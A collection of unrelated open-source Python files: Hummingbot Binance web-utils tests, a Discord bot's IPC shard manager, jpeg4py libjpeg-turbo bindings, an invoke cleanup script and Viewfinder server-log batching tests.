import hummingbot.connector.derivative.binance_perpetual.constants as CONSTANTS
from hummingbot.connector.derivative.binance_perpetual.binance_perpetual_web_utils import (
BinancePerpetualRESTPreProcessor,
)
from hummingbot.connector.time_synchronizer import TimeSynchronizer
from hummingbot.core.web_assistant.connections.data_types import RESTMethod, RESTRequest
from hummingbot.core.web_assistant.web_assistants_factory import WebAssistantsFactory
class BinancePerpetualWebUtilsUnitTests(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
super().setUpClass()
cls.ev_loop = asyncio.get_event_loop()
cls.pre_processor = BinancePerpetualRESTPreProcessor()
def async_run_with_timeout(self, coroutine: Awaitable, timeout: float = 1):
ret = self.ev_loop.run_until_complete(asyncio.wait_for(coroutine, timeout))
return ret
def test_binance_perpetual_rest_pre_processor_non_post_request(self):
request: RESTRequest = RESTRequest(
method=RESTMethod.GET,
url="/TEST_URL",
)
result_request: RESTRequest = self.async_run_with_timeout(self.pre_processor.pre_process(request))
self.assertIn("Content-Type", result_request.headers)
self.assertEqual(result_request.headers["Content-Type"], "application/x-www-form-urlencoded")
def test_binance_perpetual_rest_pre_processor_post_request(self):
request: RESTRequest = RESTRequest(
method=RESTMethod.POST,
url="/TEST_URL",
)
result_request: RESTRequest = self.async_run_with_timeout(self.pre_processor.pre_process(request))
self.assertIn("Content-Type", result_request.headers)
self.assertEqual(result_request.headers["Content-Type"], "application/json")
def test_rest_url_main_domain(self):
path_url = "/TEST_PATH_URL"
expected_url = f"{CONSTANTS.PERPETUAL_BASE_URL}{CONSTANTS.API_VERSION_V2}{path_url}"
self.assertEqual(expected_url, web_utils.rest_url(path_url, api_version=CONSTANTS.API_VERSION_V2))
self.assertEqual(expected_url, web_utils.rest_url(path_url, api_version=CONSTANTS.API_VERSION_V2))
def test_rest_url_testnet_domain(self):
path_url = "/TEST_PATH_URL"
expected_url = f"{CONSTANTS.TESTNET_BASE_URL}{CONSTANTS.API_VERSION_V2}{path_url}"
self.assertEqual(
expected_url, web_utils.rest_url(path_url=path_url, domain="testnet", api_version=CONSTANTS.API_VERSION_V2)
)
def test_wss_url_main_domain(self):
endpoint = "TEST_SUBSCRIBE"
expected_url = f"{CONSTANTS.PERPETUAL_WS_URL}{endpoint}"
self.assertEqual(expected_url, web_utils.wss_url(endpoint=endpoint))
def test_wss_url_testnet_domain(self):
endpoint = "TEST_SUBSCRIBE"
expected_url = f"{CONSTANTS.TESTNET_WS_URL}{endpoint}"
self.assertEqual(expected_url, web_utils.wss_url(endpoint=endpoint, domain="testnet"))
def test_build_api_factory(self):
api_factory = web_utils.build_api_factory(
time_synchronizer=TimeSynchronizer(),
time_provider=lambda: None,
)
self.assertIsInstance(api_factory, WebAssistantsFactory)
self.assertIsNone(api_factory._auth)
self.assertTrue(2, len(api_factory._rest_pre_processors))
|
tests/pyccel/project_rel_imports/runtest.py | dina-fouad/pyccel | 206 | 12730065 | # pylint: disable=missing-function-docstring, missing-module-docstring/
from project.folder2.mod3 import one_hundred_plus_sum_to_n_squared
if __name__ == '__main__':
print(one_hundred_plus_sum_to_n_squared(4))
|
villager-bot/karen.py | Villager-Dev/Villager-Bot | 122 | 12730101 | from concurrent.futures import ProcessPoolExecutor
from collections import defaultdict
from classyjson import ClassyDict
import asyncio
import asyncpg
import psutil
import arrow
from util.ipc import Server, PacketType, PacketHandlerRegistry, handle_packet
from util.setup import load_secrets, load_data, setup_karen_logging
from util.cooldowns import CooldownManager, MaxConcurrencyManager
from util.code import execute_code, format_exception
from util.misc import MultiLock
from bot import run_cluster
class MechaKaren(PacketHandlerRegistry):
class Share:
def __init__(self):
self.start_time = arrow.utcnow()
self.mine_commands = defaultdict(int) # {user_id: command_count}, also used for fishing btw
self.trivia_commands = defaultdict(int) # {user_id: trivia_command_count}
self.active_effects = defaultdict(set) # {user_id: [effect, potion, effect,..]}
self.pillages = defaultdict(int) # {user_id: num_successful_pillages}
self.econ_paused_users = {} # {user_id: time.time()}
def __init__(self):
self.k = load_secrets()
self.d = load_data()
self.v = self.Share()
self.logger = setup_karen_logging()
self.db = None
self.cooldowns = CooldownManager(self.d.cooldown_rates)
self.concurrency = MaxConcurrencyManager()
self.pillage_lock = MultiLock()
self.server = Server(self.k.manager.host, self.k.manager.port, self.k.manager.auth, self.get_packet_handlers())
self.shard_ids = tuple(range(self.k.shard_count))
self.online_shards = set()
self.eval_env = {"karen": self, **self.v.__dict__}
self.broadcasts = {} # {broadcast_id: {ready: asyncio.Event, responses: [response, response,..]}}
self.dm_messages = {} # {user_id: {event: asyncio.Event, content: "contents of message"}}
self.current_id = 0
self.commands = defaultdict(int)
self.commands_lock = asyncio.Lock()
self.commands_task = None
self.heal_users_task = None
self.clear_trivia_commands_task = None
self.reminders_task = None
@handle_packet(PacketType.MISSING_PACKET)
async def handle_missing_packet(self, packet: ClassyDict):
try:
packet_type = PacketType(packet.get("type"))
except ValueError:
packet_type = packet.get("type")
self.logger.error(f"Missing packet handler for packet type {packet_type}")
@handle_packet(PacketType.SHARD_READY)
async def handle_shard_ready_packet(self, packet: ClassyDict):
self.online_shards.add(packet.shard_id)
if len(self.online_shards) == len(self.shard_ids):
self.logger.info(f"\u001b[36;1mALL SHARDS\u001b[0m [0-{len(self.online_shards)-1}] \u001b[36;1mREADY\u001b[0m")
@handle_packet(PacketType.SHARD_DISCONNECT)
async def handle_shard_disconnect_packet(self, packet: ClassyDict):
self.online_shards.discard(packet.shard_id)
@handle_packet(PacketType.EVAL)
async def handle_eval_packet(self, packet: ClassyDict):
try:
result = eval(packet.code, self.eval_env)
success = True
except Exception as e:
result = format_exception(e)
success = False
self.logger.error(result)
return {"type": PacketType.EVAL_RESPONSE, "result": result, "success": success}
@handle_packet(PacketType.EXEC)
async def handle_exec_packet(self, packet: ClassyDict):
try:
result = await execute_code(packet.code, self.eval_env)
success = True
except Exception as e:
result = format_exception(e)
success = False
self.logger.error(result)
return {"type": PacketType.EXEC_RESPONSE, "result": result, "success": success}
@handle_packet(PacketType.BROADCAST_REQUEST)
async def handle_broadcast_request_packet(self, packet: ClassyDict):
"""broadcasts the packet to every connection including the broadcaster, and waits for responses"""
broadcast_id = f"b{self.current_id}"
self.current_id += 1
broadcast_packet = {**packet.packet, "id": broadcast_id}
broadcast_coros = [s.write_packet(broadcast_packet) for s in self.server.connections]
broadcast = self.broadcasts[broadcast_id] = {
"ready": asyncio.Event(),
"responses": [],
"expects": len(broadcast_coros),
}
await asyncio.wait(broadcast_coros)
await broadcast["ready"].wait()
return {"type": PacketType.BROADCAST_RESPONSE, "responses": broadcast["responses"]}
@handle_packet(PacketType.BROADCAST_RESPONSE)
async def handle_broadcast_response_packet(self, packet: ClassyDict):
broadcast = self.broadcasts[packet.id]
broadcast["responses"].append(packet)
if len(broadcast["responses"]) == broadcast["expects"]:
broadcast["ready"].set()
@handle_packet(PacketType.COOLDOWN)
async def handle_cooldown_packet(self, packet: ClassyDict):
cooldown_info = self.cooldowns.check(packet.command, packet.user_id)
return {"type": PacketType.COOLDOWN_RESPONSE, **cooldown_info}
@handle_packet(PacketType.COOLDOWN_ADD)
async def handle_cooldown_add_packet(self, packet: ClassyDict):
self.cooldowns.add_cooldown(packet.command, packet.user_id)
@handle_packet(PacketType.COOLDOWN_RESET)
async def handle_cooldown_reset_packet(self, packet: ClassyDict):
self.cooldowns.clear_cooldown(packet.command, packet.user_id)
@handle_packet(PacketType.DM_MESSAGE_REQUEST)
async def handle_dm_message_request_packet(self, packet: ClassyDict):
entry = self.dm_messages[packet.user_id] = {"event": asyncio.Event(), "content": None}
await entry["event"].wait()
self.dm_messages.pop(packet.user_id, None)
return {"type": PacketType.DM_MESSAGE, "content": entry["content"]}
@handle_packet(PacketType.DM_MESSAGE)
async def handle_dm_message_packet(self, packet: ClassyDict):
entry = self.dm_messages.get(packet.user_id)
if entry is None:
return
entry["content"] = packet.content
entry["event"].set()
@handle_packet(PacketType.MINE_COMMAND)
async def handle_mine_command_packet(self, packet: ClassyDict): # used for fishing too
self.v.mine_commands[packet.user_id] += packet.addition
return {"type": PacketType.MINE_COMMAND_RESPONSE, "current": self.v.mine_commands[packet.user_id]}
@handle_packet(PacketType.MINE_COMMANDS_RESET)
async def handle_mine_commands_reset_packet(self, packet: ClassyDict):
self.v.mine_commands[packet.user] = 0
@handle_packet(PacketType.CONCURRENCY_CHECK)
async def handle_concurrency_check_packet(self, packet: ClassyDict):
return {
"type": PacketType.CONCURRENCY_CHECK_RESPONSE,
"can_run": self.concurrency.check(packet.command, packet.user_id),
}
@handle_packet(PacketType.CONCURRENCY_ACQUIRE)
async def handle_concurrency_acquire_packet(self, packet: ClassyDict):
self.concurrency.acquire(packet.command, packet.user_id)
@handle_packet(PacketType.CONCURRENCY_RELEASE)
async def handle_concurrency_release_packet(self, packet: ClassyDict):
self.concurrency.release(packet.command, packet.user_id)
@handle_packet(PacketType.COMMAND_RAN)
async def handle_command_ran_packet(self, packet: ClassyDict):
async with self.commands_lock:
self.commands[packet.user_id] += 1
@handle_packet(PacketType.ACQUIRE_PILLAGE_LOCK)
async def handle_acquire_pillage_lock_packet(self, packet: ClassyDict):
await self.pillage_lock.acquire(packet.user_ids)
return {}
@handle_packet(PacketType.RELEASE_PILLAGE_LOCK)
async def handle_release_pillage_lock_packet(self, packet: ClassyDict):
self.pillage_lock.release(packet.user_ids)
@handle_packet(PacketType.PILLAGE)
async def handle_pillage_packet(self, packet: ClassyDict):
self.v.pillages[packet.pillager] += 1
return {"pillager": self.v.pillages[packet.pillager] - 1, "victim": self.v.pillages[packet.victim] - 1}
@handle_packet(PacketType.FETCH_STATS)
async def handle_fetch_stats_packet(self, packet: ClassyDict):
proc = psutil.Process()
with proc.oneshot():
mem_usage = proc.memory_full_info().uss
threads = proc.num_threads()
return {"type": PacketType.STATS_RESPONSE, "stats": [mem_usage, threads, len(asyncio.all_tasks())] + [0] * 7}
@handle_packet(PacketType.TRIVIA)
async def handle_trivia_packet(self, packet: ClassyDict):
self.v.trivia_commands[packet.author] += 1
return {"do_reward": self.v.trivia_commands[packet.author] < 5}
async def commands_dump_loop(self):
try:
while True:
await asyncio.sleep(60)
if self.commands:
async with self.commands_lock:
commands_dump = list(self.commands.items())
user_ids = [(user_id,) for user_id in list(self.commands.keys())]
self.commands.clear()
await self.db.executemany(
'INSERT INTO users (user_id) VALUES ($1) ON CONFLICT ("user_id") DO NOTHING', user_ids
) # ensure users are in the database first
await self.db.executemany(
'INSERT INTO leaderboards (user_id, commands) VALUES ($1, $2) ON CONFLICT ("user_id") DO UPDATE SET "commands" = leaderboards.commands + $2 WHERE leaderboards.user_id = $1',
commands_dump,
)
except Exception as e:
self.logger.error(format_exception(e))
async def heal_users_loop(self):
while True:
await asyncio.sleep(32)
try:
await self.db.execute("UPDATE users SET health = health + 1 WHERE health < 20")
except Exception as e:
self.logger.error(format_exception(e))
async def clear_trivia_commands_loop(self):
while True:
await asyncio.sleep(10 * 60)
try:
self.v.trivia_commands.clear()
except Exception as e:
self.logger.error(format_exception(e))
async def remind_reminders_loop(self):
while True:
await asyncio.sleep(5)
try:
reminders = await self.db.fetch(
"DELETE FROM reminders WHERE at <= NOW() RETURNING channel_id, user_id, message_id, reminder"
)
for reminder in reminders:
broadcast_id = f"b{self.current_id}"
self.current_id += 1
broadcast_packet = {"type": PacketType.REMINDER, "id": broadcast_id, **reminder}
broadcast_coros = [s.write_packet(broadcast_packet) for s in self.server.connections]
broadcast = self.broadcasts[broadcast_id] = {
"ready": asyncio.Event(),
"responses": [],
"expects": len(broadcast_coros),
}
await asyncio.wait(broadcast_coros)
await broadcast["ready"].wait()
except Exception as e:
self.logger.error(format_exception(e))
with open("reminderrors.txt", "a+") as f:
f.write("\n" + format_exception(e) + "\n")
async def start(self, pp):
self.db = await asyncpg.create_pool(
host=self.k.database.host, # where db is hosted
database=self.k.database.name, # name of database
user=self.k.database.user, # database username
password=<PASSWORD>, # password which goes with user
max_size=3,
min_size=1,
)
await self.server.start()
self.cooldowns.start()
self.commands_task = asyncio.create_task(self.commands_dump_loop())
self.heal_users_task = asyncio.create_task(self.heal_users_loop())
self.clear_trivia_commands_task = asyncio.create_task(self.clear_trivia_commands_loop())
self.reminders_task = asyncio.create_task(self.remind_reminders_loop())
shard_groups = []
loop = asyncio.get_event_loop()
g = self.k.cluster_size
# calculate max connections to the db server per process allowed
# postgresql is usually configured to allow 100 max, so we use
# 75 to leave room for other programs using the db server
db_pool_size_per = 75 // (self.k.shard_count // g + 1)
for shard_id_group in [self.shard_ids[i : i + g] for i in range(0, len(self.shard_ids), g)]:
shard_groups.append(loop.run_in_executor(pp, run_cluster, self.k.shard_count, shard_id_group, db_pool_size_per))
await asyncio.wait(shard_groups)
self.cooldowns.stop()
self.commands_task.cancel()
self.heal_users_task.cancel()
self.clear_trivia_commands_task.cancel()
self.reminders_task.cancel()
await self.db.close()
def run(self):
with ProcessPoolExecutor(self.k.shard_count // self.k.cluster_size + 1) as pp:
asyncio.run(self.start(pp))
|
src/jpeg4py/_py.py | ajkxyz/jpeg4py | 103 | 12730118 | <reponame>ajkxyz/jpeg4py<gh_stars>100-1000
"""
Copyright (c) 2014, Samsung Electronics Co.,Ltd.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The views and conclusions contained in the software and documentation are those
of the authors and should not be interpreted as representing official policies,
either expressed or implied, of Samsung Electronics Co.,Ltd..
"""
"""
jpeg4py - libjpeg-turbo cffi bindings and helper classes.
URL: https://github.com/ajkxyz/jpeg4py
Original author: <NAME> <<EMAIL>>
"""
"""
Helper classes for libjpeg-turbo cffi bindings.
"""
import jpeg4py._cffi as jpeg
from jpeg4py._cffi import TJPF_RGB
import numpy
import os
class JPEGRuntimeError(RuntimeError):
def __init__(self, msg, code):
super(JPEGRuntimeError, self).__init__(msg)
self.code = code
class Base(object):
"""Base class.
Attributes:
lib_: cffi handle to loaded shared library.
"""
def __init__(self, lib_):
"""Constructor.
Parameters:
lib_: cffi handle to loaded shared library.
"""
if lib_ is None:
jpeg.initialize()
lib_ = jpeg.lib
self.lib_ = lib_
def get_last_error(self):
"""Returns last error string.
"""
return jpeg.ffi.string(self.lib_.tjGetErrorStr()).decode("utf-8")
class Handle(Base):
"""Stores tjhandle pointer.
Attributes:
handle_: cffi tjhandle pointer.
"""
def __init__(self, handle_, lib_):
"""Constructor.
Parameters:
handle_: cffi tjhandle pointer.
"""
self.handle_ = None
super(Handle, self).__init__(lib_)
self.handle_ = handle_
def release(self):
if self.handle_ is not None:
self.lib_.tjDestroy(self.handle_)
self.handle_ = None
class JPEG(Base):
"""Main class.
Attributes:
decompressor: Handle object for decompressor.
source: numpy array with source data,
either encoded raw jpeg which may be decoded/transformed or
or source image for the later encode.
width: image width.
height: image height.
subsampling: level of chrominance subsampling.
Static attributes:
decompressors: list of decompressors for caching purposes.
"""
decompressors = []
@staticmethod
def clear():
"""Clears internal caches.
"""
# Manually release cached JPEG decompressors
for handle in reversed(JPEG.decompressors):
handle.release()
del JPEG.decompressors[:]
def __init__(self, source, lib_=None):
"""Constructor.
Parameters:
source: source for JPEG operations (numpy array or file name).
"""
super(JPEG, self).__init__(lib_)
self.decompressor = None
self.width = None
self.height = None
self.subsampling = None
if hasattr(source, "__array_interface__"):
self.source = source
elif numpy.fromfile is not None:
self.source = numpy.fromfile(source, dtype=numpy.uint8)
else:
fin = open(source, "rb")
self.source = numpy.empty(os.path.getsize(source),
dtype=numpy.uint8)
fin.readinto(self.source)
fin.close()
def _get_decompressor(self):
if self.decompressor is not None:
return
try:
self.decompressor = JPEG.decompressors.pop(-1)
except IndexError:
d = self.lib_.tjInitDecompress()
if d == jpeg.ffi.NULL:
raise JPEGRuntimeError(
"tjInitDecompress() failed with error "
"string %s" % self.get_last_error(), 0)
self.decompressor = Handle(d, self.lib_)
def parse_header(self):
"""Parses JPEG header.
Fills self.width, self.height, self.subsampling.
"""
self._get_decompressor()
whs = jpeg.ffi.new("int[]", 3)
whs_base = int(jpeg.ffi.cast("size_t", whs))
whs_itemsize = int(jpeg.ffi.sizeof("int"))
n = self.lib_.tjDecompressHeader2(
self.decompressor.handle_,
jpeg.ffi.cast("unsigned char*",
self.source.__array_interface__["data"][0]),
self.source.nbytes,
jpeg.ffi.cast("int*", whs_base),
jpeg.ffi.cast("int*", whs_base + whs_itemsize),
jpeg.ffi.cast("int*", whs_base + whs_itemsize + whs_itemsize))
if n:
raise JPEGRuntimeError("tjDecompressHeader2() failed with error "
"%d and error string %s" %
(n, self.get_last_error()), n)
self.width = int(whs[0])
self.height = int(whs[1])
self.subsampling = int(whs[2])
def decode(self, dst=None, pixfmt=TJPF_RGB):
bpp = jpeg.tjPixelSize[pixfmt]
if dst is None:
if self.width is None:
self.parse_header()
sh = [self.height, self.width]
if bpp > 1:
sh.append(bpp)
dst = numpy.zeros(sh, dtype=numpy.uint8)
elif not hasattr(dst, "__array_interface__"):
raise ValueError("dst should be numpy array or None")
if len(dst.shape) < 2:
raise ValueError("dst shape length should 2 or 3")
if dst.nbytes < dst.shape[1] * dst.shape[0] * bpp:
raise ValueError(
"dst is too small to hold the requested pixel format")
self._get_decompressor()
n = self.lib_.tjDecompress2(
self.decompressor.handle_,
jpeg.ffi.cast("unsigned char*",
self.source.__array_interface__["data"][0]),
self.source.nbytes,
jpeg.ffi.cast("unsigned char*",
dst.__array_interface__["data"][0]),
dst.shape[1], dst.strides[0], dst.shape[0], pixfmt, 0)
if n:
raise JPEGRuntimeError("tjDecompress2() failed with error "
"%d and error string %s" %
(n, self.get_last_error()), n)
return dst
def __del__(self):
# Return decompressor to cache.
if self.decompressor is not None:
JPEG.decompressors.append(self.decompressor)
|
tasks.py | imkevinxu/django-kevin | 250 | 12730126 | from invoke import task, run
from os.path import dirname, abspath
# Create scripted tasks to run in command-line here
# http://docs.pyinvoke.org/en/latest/
PROJECT_ROOT = '%s/{{ project_name }}' % dirname(abspath(__file__))
@task
def clean():
"""Clean up static, compiled, test, and log files"""
print("Deleting *.pyc files...")
run('find . -name *.pyc -delete')
print("Deleting collected static files...")
run('rm -rf %s/public' % PROJECT_ROOT)
print("Deleting compiled stylesheets...")
run('rm -rf %s/static/css/build' % PROJECT_ROOT)
print("Deleting compiled scripts...")
run('rm -rf %s/static/js/build' % PROJECT_ROOT)
run('rm -rf %s/static/js/tests/build' % PROJECT_ROOT)
print('Deleting compressed images...')
run('rm -rf %s/static/img/compressed' % PROJECT_ROOT)
print('Deleting test files...')
run('rm -rf tests/*')
run('rm -rf .coverage')
run('rm -rf _SpecRunner.html')
print('Deleting log files...')
run('rm -rf logs/*')
|
backend/storage/test/server_log_test.py | xuantan/viewfinder | 645 | 12730151 | <reponame>xuantan/viewfinder
# Copyright 2012 Viewfinder Inc. All Rights Reserved.
"""Server log tests.
"""
__author__ = '<EMAIL> (<NAME>)'
import logging
import os
import re
import sys
import tempfile
import time
from functools import partial
from tornado import options, testing
from viewfinder.backend.storage.object_store import ObjectStore, InitObjectStore
from viewfinder.backend.storage.file_object_store import FileObjectStore
from viewfinder.backend.storage.server_log import BatchingLogHandler, LogBatch, LogBatchPersistor, InitServerLog, FinishServerLog
from viewfinder.backend.base import util, counters
from viewfinder.backend.base.testing import async_test, BaseTestCase
class _BadObjectStore(FileObjectStore):
"""A file object store which simply does not return requests for
puts. If 'fail_fast' is True, returns an error immediately.
"""
def __init__(self, bucket_name, temporary=False, fail_fast=False):
super(_BadObjectStore, self).__init__(bucket_name, temporary)
self._fail_fast = fail_fast
self._put_map = dict()
def Put(self, key, value, callback):
self._put_map[key] = value
if self._fail_fast:
raise Exception('failed to put key %s' % key)
def GetPutValue(self, key):
return self._put_map[key]
class _FakePersistor(object):
"""Fake log persistor - simply accepts batches without accepting them."""
def __init__(self):
self.batches = {}
self._handlers = []
def PersistLogBatch(self, batch):
self.batches[batch.Key()] = batch
def AddHandler(self, handler):
"""Add a handler to the list of handlers registered with this persistor."""
if not handler in self._handlers:
self._handlers.append(handler)
def RemoveHandler(self, handler):
"""Remove a handler from the list of handlers registered with this persistor."""
if handler in self._handlers:
self._handlers.remove(handler)
def close(self, callback=None):
for h in list(self._handlers):
h.close()
if callback:
callback()
class _BasicLogHandler(BatchingLogHandler):
STORE_NAME = 'basic_store'
def __init__(self, *args, **kwargs):
super(_BasicLogHandler, self).__init__(*args, **kwargs)
self.batch_no = 0
def MakeBatch(self, buffer):
self.batch_no += 1
return LogBatch(buffer, self.STORE_NAME, 'basic', self.batch_no)
class LogBatchPersistorTestCase(BaseTestCase, testing.LogTrapTestCase):
def setUp(self):
options.options.fileobjstore = True
super(LogBatchPersistorTestCase, self).setUp()
InitObjectStore(temporary=True)
def tearDown(self):
super(LogBatchPersistorTestCase, self).tearDown()
def testPersistor(self):
"""Basic test for a log persistor."""
backup_dir = tempfile.mkdtemp()
persistor = LogBatchPersistor(backup_dir=backup_dir)
batches = [LogBatch('Log batch buffer 1A', ObjectStore.SERVER_LOG, 'test1', 'keyA'),
LogBatch('Log batch buffer 2B', ObjectStore.SERVER_LOG, 'test2', 'keyB'),
LogBatch('Log batch buffer 3C', ObjectStore.SERVER_LOG, 'test3', 'keyC'),
LogBatch('Log batch buffer 4D', ObjectStore.USER_LOG, 'test4', 'keyD'),
LogBatch('Log batch buffer 5E', ObjectStore.USER_LOG, 'test5', 'keyE')]
for batch in batches:
persistor.PersistLogBatch(batch)
self._RunAsync(persistor.Wait)
# No files should have been backed up.
files = os.listdir(os.path.join(backup_dir, os.path.basename(sys.argv[0])))
self.assertEqual(0, len(files))
self._RunAsync(self._VerifyObjStoreBatches, batches)
def testBadObjStore(self):
"""Tests backup storage in case the object store is down. Also verifies close() method."""
backup_dir = tempfile.mkdtemp()
persistor = LogBatchPersistor(backup_dir=backup_dir)
batches = [LogBatch('Log batch buffer 1A', ObjectStore.SERVER_LOG, 'test1', 'keyA'),
LogBatch('Log batch buffer 2B', ObjectStore.SERVER_LOG, 'test2', 'keyB'),
LogBatch('Log batch buffer 3C', ObjectStore.SERVER_LOG, 'test3', 'keyC'),
LogBatch('Log batch buffer 4D', ObjectStore.USER_LOG, 'test4', 'keyD'),
LogBatch('Log batch buffer 5E', ObjectStore.USER_LOG, 'test5', 'keyE')]
oldStores = [ObjectStore.GetInstance(ObjectStore.SERVER_LOG),
ObjectStore.GetInstance(ObjectStore.USER_LOG)]
ObjectStore.SetInstance(ObjectStore.SERVER_LOG,
_BadObjectStore(ObjectStore.SERVER_LOG_BUCKET,
temporary=True, fail_fast=False))
ObjectStore.SetInstance(ObjectStore.USER_LOG,
_BadObjectStore(ObjectStore.USER_LOG_BUCKET,
temporary=True, fail_fast=False))
# Cut the timeout allowed for flushing buffers on close to something small.
persistor._CLOSE_TIMEOUT_SECS = 0.100
for batch in batches:
persistor.PersistLogBatch(batch)
self._RunAsync(persistor.close)
self._VerifyBackupBatches(backup_dir, batches)
# Set a functional file object store instance and verify that it
# restores the pending server logs.
ObjectStore.SetInstance(ObjectStore.SERVER_LOG,
oldStores[0])
ObjectStore.SetInstance(ObjectStore.USER_LOG,
oldStores[1])
persistor = LogBatchPersistor(backup_dir=backup_dir)
self._RunAsync(persistor.Wait)
self._RunAsync(self._VerifyObjStoreBatches, batches)
def testRestoreTimeout(self):
"""Verifies the persistor will reattempt failed object store writes after a timeout"""
backup_dir = tempfile.mkdtemp()
persistor = LogBatchPersistor(backup_dir=backup_dir)
batches = [LogBatch('Log batch buffer 1A', ObjectStore.SERVER_LOG, 'test1', 'keyA'),
LogBatch('Log batch buffer 2B', ObjectStore.SERVER_LOG, 'test2', 'keyB'),
LogBatch('Log batch buffer 3C', ObjectStore.SERVER_LOG, 'test3', 'keyC')]
persistor._RESTORE_INTERVAL_SECS = 0.100
# The "bad" object store which does nothing with puts.
oldStore = ObjectStore.GetInstance(ObjectStore.SERVER_LOG)
ObjectStore.SetInstance(ObjectStore.SERVER_LOG,
_BadObjectStore(ObjectStore.SERVER_LOG_BUCKET,
temporary=True, fail_fast=True))
for batch in batches:
persistor.PersistLogBatch(batch)
self.io_loop.add_callback(partial(self._VerifyBackupBatches, backup_dir, batches))
# Reinstate the "good" object store.
ObjectStore.SetInstance(ObjectStore.SERVER_LOG, oldStore)
self._RunAsync(self.io_loop.add_timeout, time.time() + 0.200)
self._RunAsync(self._VerifyObjStoreBatches, batches)
def _SortBatchesByStore(self, batches):
batches_by_store = {}
for batch in batches:
key = batch.store_name
store_batches = batches_by_store.setdefault(key, [])
store_batches.append(batch)
return batches_by_store
def _VerifyObjStoreBatches(self, exp_batches, callback):
def _OnGetBatch(exp_batch, cb, buffer):
self.assertEqual(exp_batch.buffer, buffer)
cb()
def _OnListKeys(store, batches, cb, keys):
self.assertEqual(len(batches), len(keys))
with util.Barrier(cb) as b2:
for batch in batches:
self.assertIn(batch.Key(), keys)
store.Get(batch.Key(), partial(_OnGetBatch, batch, b2.Callback()))
batches_by_store = self._SortBatchesByStore(exp_batches)
with util.Barrier(callback) as b:
for store in batches_by_store.keys():
batches = batches_by_store[store]
store = ObjectStore.GetInstance(store)
store.ListKeys(partial(_OnListKeys, store, batches, b.Callback()))
def _VerifyBackupBatches(self, backup_dir, exp_batches):
batches_by_store = self._SortBatchesByStore(exp_batches)
dir = os.path.join(backup_dir, os.path.basename(sys.argv[0]))
store_dirs = os.listdir(dir)
self.assertEqual(len(batches_by_store.keys()), len(store_dirs))
for store in batches_by_store.keys():
self.assertIn(store, store_dirs)
store_dir = os.path.join(dir, store)
batches = batches_by_store[store]
self.assertEqual(len(batches), len(os.listdir(store_dir)))
for batch in batches:
file = os.path.join(store_dir, batch.FileSystemKey())
self.assertTrue(os.path.exists(file))
self.assertTrue(os.path.isfile(file))
with open(file, 'r') as f:
buffer = f.read()
self.assertEqual(batch.buffer, buffer)
class BatchingLogHandlerTestCase(BaseTestCase, testing.LogTrapTestCase):
def setUp(self):
super(BatchingLogHandlerTestCase, self).setUp()
self._persistor = _FakePersistor()
LogBatchPersistor.SetInstance(self._persistor)
def testBatching(self):
"""Tests that the server log writes to object store."""
basic_log = _BasicLogHandler(max_buffer_bytes=100)
record = logging.makeLogRecord({'level': logging.INFO, 'msg': 'test'})
basic_log.emit(record)
basic_log.flush()
self._RunAsync(self._VerifyLog, ['test'])
def testBadLogMessages(self):
"""Tests log messages with both 8-bit byte strings and unicode."""
basic_log = _BasicLogHandler(max_buffer_bytes=100)
record = logging.makeLogRecord({'level': logging.INFO, 'msg': '\x80abc'})
basic_log.emit(record)
record = logging.makeLogRecord({'level': logging.INFO, 'msg': u'\x80abc'})
basic_log.emit(record)
basic_log.flush()
def testMultipleFlushes(self):
"""Tests multiple flushes."""
basic_log = _BasicLogHandler(flush_interval_secs=0.100)
for i in xrange(8):
record = logging.makeLogRecord({'level': logging.INFO, 'msg': 'test%d' % i})
basic_log.emit(record)
basic_log.flush()
self._RunAsync(self._VerifyLog, ['test%d' % i for i in range(8)])
def testMaxBytesFlush(self):
"""Tests that the server log flushes based on maximum bytes written."""
basic_log = _BasicLogHandler(max_buffer_bytes=100)
msg = 'test' * 100
record = logging.makeLogRecord({'level': logging.INFO, 'msg': msg})
basic_log.emit(record)
self._RunAsync(self._VerifyLog, [msg])
def testTimeoutFlush(self):
"""Tests that the server log flushes after maximum flush interval."""
basic_log = _BasicLogHandler(flush_interval_secs=0.100)
record = logging.makeLogRecord({'level': logging.INFO, 'msg': 'test'})
basic_log.emit(record)
self._RunAsync(self.io_loop.add_timeout, time.time() + 0.150)
self._RunAsync(self._VerifyLog, ['test'])
def testFinishServerLog(self):
"""Verify that 'close()' is called on the server handler when the persistor
is closed.
"""
persistor = _FakePersistor()
InitServerLog(persistor)
self.assertEqual(2, len(persistor._handlers))
basic_handler = _BasicLogHandler()
basic_handler.setLevel(logging.INFO)
with basic_handler.LoggingContext():
self.assertEqual(3, len(persistor._handlers))
self.assertEqual(0, len(persistor.batches))
logging.info('Test Message')
self.assertEqual(3, len(persistor._handlers))
self._RunAsync(FinishServerLog)
self.assertEqual(0, len(persistor._handlers))
self.assertEqual(2, len(persistor.batches))
def testFinishServerLogWithErrors(self):
"""Verify that the error log handler properly batches.
"""
persistor = _FakePersistor()
InitServerLog(persistor)
self.assertEqual(2, len(persistor._handlers))
basic_handler = _BasicLogHandler()
basic_handler.setLevel(logging.INFO)
with basic_handler.LoggingContext():
self.assertEqual(3, len(persistor._handlers))
self.assertEqual(0, len(persistor.batches))
logging.error('Test Error')
self.assertEqual(3, len(persistor._handlers))
